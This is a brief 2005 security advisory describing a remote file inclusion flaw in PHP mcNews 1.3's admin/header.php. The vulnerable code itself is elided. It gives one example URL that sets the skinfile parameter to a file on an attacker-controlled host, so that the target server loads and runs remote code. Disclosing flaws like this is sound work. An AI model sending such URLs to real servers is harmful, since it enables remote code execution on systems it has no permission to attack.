-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP mcNews Version: 1.3 Homepage: http://www.phpforums.net/index.php?dir=dld Author: Filip Groszynski (VXSfx) Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in mcNews/admin/header.php: ... ... -------------------------------------------------------- Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/ -------------------------------------------------------- Contact: Author: Filip Groszynski Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --